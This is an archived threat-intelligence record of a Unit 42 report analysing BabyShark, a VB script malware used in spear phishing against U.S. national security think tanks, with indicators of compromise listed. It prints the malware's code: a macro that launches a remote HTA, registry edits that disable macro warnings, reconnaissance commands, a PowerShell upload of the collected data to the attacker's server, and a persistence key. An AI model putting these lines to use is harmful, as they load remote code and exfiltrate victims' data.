{
	"id": "673486ed-1f75-4ad2-b250-5f03a7d4bd48",
	"created_at": "2026-04-06T00:15:50.099715Z",
	"updated_at": "2026-04-10T03:22:37.408402Z",
	"deleted_at": null,
	"sha1_hash": "c83ac0b0a007d8cd4a030133253604e4d51cb9d5",
	"title": "New BabyShark Malware Targets U.S. National Security Think Tanks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 988850,
	"plain_text": "New BabyShark Malware Targets U.S. National Security Think\r\nTanks\r\nBy Unit 42\r\nPublished: 2019-02-22 · Archived: 2026-04-02 12:06:51 UTC\r\nIn February 2019, Palo Alto Networks Unit 42 researchers identified spear phishing emails sent in November\r\n2018 containing new malware that shares infrastructure with playbooks associated with North Korean campaigns.\r\nThe spear phishing emails were written to appear as though they were sent from a nuclear security expert who\r\ncurrently works as a consultant for in the U.S. The emails were sent using a public email address with the expert’s\r\nname and had a subject referencing North Korea’s nuclear issues. The emails had a malicious Excel macro\r\ndocument attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family\r\nwhich we are dubbing “BabyShark”.\r\nBabyShark is a relatively new malware. The earliest sample we found from open source repositories and our\r\ninternal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a\r\nremote location, thus it can be delivered via different file types including PE files as well as malicious documents.\r\nIt exfiltrates system information to C2 server, maintains persistence on the system, and waits for further\r\ninstruction from the operator. Figure 1, below, shows the flow of execution.\r\nFigure 1 BabyShark execution flow\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 1 of 10\n\nUnit 42 was able to determine the phishing emails targeted at least:\r\nA university in the U.S. which was to hold a conference about North Korea denuclearization issue at the\r\ntime\r\nA research institute based in the U.S. which serves as a think tank for national security issues, and where\r\nthe previously referenced nuclear expert currently works.\r\nExpanding our search to public repository samples, we identified additional malicious document samples\r\ndelivering BabyShark. The original file names and decoy contents of these samples suggested that the threat actor\r\nmight have interests in gathering intelligence related to not only North Korea, but possibly wider in the Northeast\r\nAsia region.\r\nDuring the investigation, we were able to find links to other suspected North Korean activities in the past;\r\nKimJongRAT and STOLEN PENCIL.\r\nMalicious Documents\r\nBabyShark is a relatively new malware. The first sample we observed is from November 2018. The decoy\r\ncontents of all malicious documents delivering BabyShark were written in English and were related to Northeast\r\nAsia’s regional security issues.\r\nFigure 2 Timeline of BabyShark malicious documents and filename / decoys\r\nWhile some decoys used content which is publicly available information on the internet, some used content which\r\nappears to not be public. Inspecting the metadata of the documents with this non-public content, we suspect that\r\nthe threat actor likely compromised someone with access to private documents at a U.S. national security think\r\ntank.\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 2 of 10\n\nFigure 3 Decoy content copied from the internet\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 3 of 10\n\nFigure 4 Decoy content not publicly available on the internet (intentionally obfuscated)\r\nThe malicious documents contain a simple macro which would load the BabyShark’s first stage HTA at a remote\r\nlocation.\r\nSub AutoOpen()\r\nShell (\"mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta\")\r\nEnd Sub\r\nBabyShark Malware Analysis\r\nAnalyzed sample details:\r\nSHA256 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8\r\nCreate Date 2018:12:31 02:40:00Z\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 4 of 10\n\nModify Date 2019:01:10 06:54:00Z\r\nFilename Oct_Bld_full_view.docm\r\nTable 1 Analyzed sample details\r\nThe sample is a Word document which contains a malicious macro loading BabyShark by executing the first stage\r\nHTA file at a remote location below:\r\nhttps://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta\r\nAfter successfully loading the first stage HTA, it sends out an HTTP GET request to another location on the same\r\nC2 server, then decodes the response content with the following decoder function.\r\nFunction Co00(c)\r\nL=Len(c)\r\ns=\"\"\r\nFor jx=0 To d-1\r\nFor ix=0 To Int(L/d)-1\r\ns=s\u0026Mid(c,ix*d+jx+1,1)\r\nNext\r\nNext\r\ns=s\u0026Right(c,L-Int(L/d)*d)\r\nCo00=s\r\nEnd Function\r\nThe decoded BabyShark VB script first enables all future macros for Microsoft Word and Excel by adding the\r\nfollowing registry keys:\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\14.0\\WORD\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\15.0\\WORD\\Security\\VBAWarnings, value:1\r\nHKCU\\Software\\Microsoft\\Office\\16.0\\WORD\\Security\\VBAWarnings, value:1\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 5 of 10\n\nIt then issues a sequence of Windows commands and saves the results in %AppData%\\Microsoft\\ttmp.log.\r\nwhoami\r\nhostname\r\nipconfig /all\r\nnet user\r\ndir \"%programfiles%\"\r\ndir \"%programfiles% (x86)\"\r\ndir \"%programdata%\\Microsoft\\Windows\\Start Menu\"\r\ndir \"%programdata%\\Microsoft\\Windows\\Start Menu\\Programs\"\r\ndir \"%appdata%\\Microsoft\\Windows\\Recent\"\r\ntasklist\r\nver\r\nset\r\nreg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"\r\nThe collected data is encoded using Windows certutil.exe tool, then uploaded to the C2 via a HTTP POST request.\r\nretu=wShell.run(\"certutil -f -encode \"\"\"\u0026ttmp\u0026\"\"\" \"\"\"\u0026ttmp1\u0026\"\"\"\",0,true)\r\nretu=wShell.run(\"powershell.exe (New-Object\r\nSystem.Net.WebClient).UploadFile('https://tdalpacafarm[.]com/files/kr/contents/upload.php','\"\u0026ttmp1\u0026\"');del\r\n\"\"\"\u0026ttmp1\u0026\"\"\";del \"\"\"\u0026ttmp\u0026\"\"\"\",0,true)\r\nBabyShark adds the following registry key value to maintain persistence and waits for further commands from the\r\noperator. Unfortunately, we were not able to collect additional commands issued by the operator.\r\nHKCU\\Software\\Microsoft\\Command Processor\\AutoRun, value: “powershell.exe mshta\r\nhttps://tdalpacafarm[.]com/files/kr/contents/Usoro.hta\"\r\nThis registry key executes the string value when cmd.exe is launched. BabyShark ensures cmd.exe is launched by\r\nregistering the following scripts as scheduled tasks:\r\n[%AppData%\\Microsoft\\Axz\\zvftz.vbs]\r\nSet wShell=CreateObject(\"WScript.Shell\"):retu=wShell.run(\"cmd.exe /c taskkill /im cmd.exe\",0,true)\r\n[%AppData%\\Adobe\\Gqe\\urjlt.js]\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 6 of 10\n\nwShell=new ActiveXObject(\"WScript.Shell\");retu=wShell.run(\"cmd.exe /c taskkill /im cmd.exe\"\",0,true);\r\nLinks to Other Activity\r\nWe noticed BabyShark having connections with other suspected North Korean activities in the past; KimJongRAT\r\nand STOLEN PENCIL.\r\nKimJongRAT connection:\r\nBabyShark and KimJongRAT use the same file path for storing collected system information:\r\n%AppData%/Microsoft/ttmp.log.\r\nKimJongRAT had similar interests in targeting national security related targets. The malware was delivered\r\nwith the following decoys:\r\nDecoy Filename Dropper SHA256\r\nKendall-AFA 2014\r\nConference-17Sept14.pdf\r\nc4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0\r\nU.S. Nuclear\r\nDeterrence.pdf\r\n1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d\r\n제30차한미안보 안내장\r\nENKO.fdp.etadpU.scr\r\n(translates to 30th Korea-U.S. National Security\r\nInvitation Update)\r\nb3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b\r\nConference\r\nInformation_2010 IFANS\r\nConference on Global\r\nAffairs (1001).pdf\r\n0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972\r\nTable 2 Decoy filename used when delivering KimJongRAT\r\nThe threat actor behind the BabyShark malware frequently tested its samples for anti-virus detection when\r\ndeveloping the malware. The testing samples included a freshly compiled KimJongRAT.\r\nSHA256 Size\r\nCompile\r\nDate\r\nAV Test\r\nSite\r\nUpload\r\nDate\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 7 of 10\n\n52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731\r\n685,568\r\nbytes\r\n2019-\r\n01-04\r\n05:44:31\r\n2019-\r\n01-04\r\n08:15:41\r\nTable 3 Freshly compiled testing KimJongRAT sample\r\nSTOLEN PENCIL connection:\r\nA freshly compiled testing version of a PE type BabyShark loader was uploaded to a public sample\r\nrepository. The sample was signed with the stolen codesigning certificate used in the STOLEN PENCIL\r\ncampaign. We did not notice any other malware being signed with this certificate.\r\nSHA256 Size\r\nCompile\r\nDate\r\nAV Test\r\nSite\r\nUpload\r\nDate\r\n6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c\r\n32,912\r\nbytes\r\n2018-\r\n12-21\r\n00:34:35\r\n2018-\r\n12-21\r\n08:30:28\r\nTable 4 Signed testing version of PE type BabyShark loader sample\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 8 of 10\n\nFigure 5 Codesign details\r\nConclusion\r\nBabyShark is being used in a limited spear phishing campaign which started in November 2018 and is still\r\nongoing. The threat actor behind it has a clear focus on gathering intelligence related to Northeast Asia’s national\r\nsecurity issues. Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the\r\ntargets, and also closely monitors related community events to gather the latest intelligence. While not conclusive,\r\nwe suspect that the threat actor behind BabyShark is likely connected to the same actor who used the\r\nKimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN\r\nPENCIL campaign. We also noticed testing indicating the attackers are working on a PE loader for BabyShark.\r\nThe threat actor may use different methods to deliver BabyShark in the future campaigns.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nWildFire and Traps detect all the malware supported in this report as malicious.\r\nC2 domains used by the attackers are blocked via Threat Prevention.\r\nAutoFocus customers can monitor ongoing activity from the threats discussed in this report by looking at the\r\nfollowing tag:\r\nBabyShark\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit cyberthreatalliance.org.\r\nIndicators of Compromise\r\nMalicious Documents:\r\n7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa\r\n9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8\r\n2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e\r\n66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2\r\n8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6\r\n331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7\r\n1334c087390fb946c894c1863dfc9f0a659f594a3d6307fb48f24c30a23e0fc0\r\ndc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 9 of 10\n\n94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0\r\nPE version loader, signed with stolen certificate:\r\n6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c\r\nSource: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
	],
	"report_names": [
		"new-babyshark-malware-targets-u-s-national-security-think-tanks"
	],
	"threat_actors": [
		{
			"id": "a02bb810-5dd2-46c1-a609-b44d984d96d0",
			"created_at": "2022-10-25T15:50:23.505735Z",
			"updated_at": "2026-04-10T02:00:05.398328Z",
			"deleted_at": null,
			"main_name": "Stolen Pencil",
			"aliases": [
				"Stolen Pencil"
			],
			"source_name": "MITRE:Stolen Pencil",
			"tools": [
				"Mimikatz",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434550,
	"ts_updated_at": 1775791357,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.pdf",
		"text": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.txt",
		"img": "https://archive.orkl.eu/c83ac0b0a007d8cd4a030133253604e4d51cb9d5.jpg"
	}
}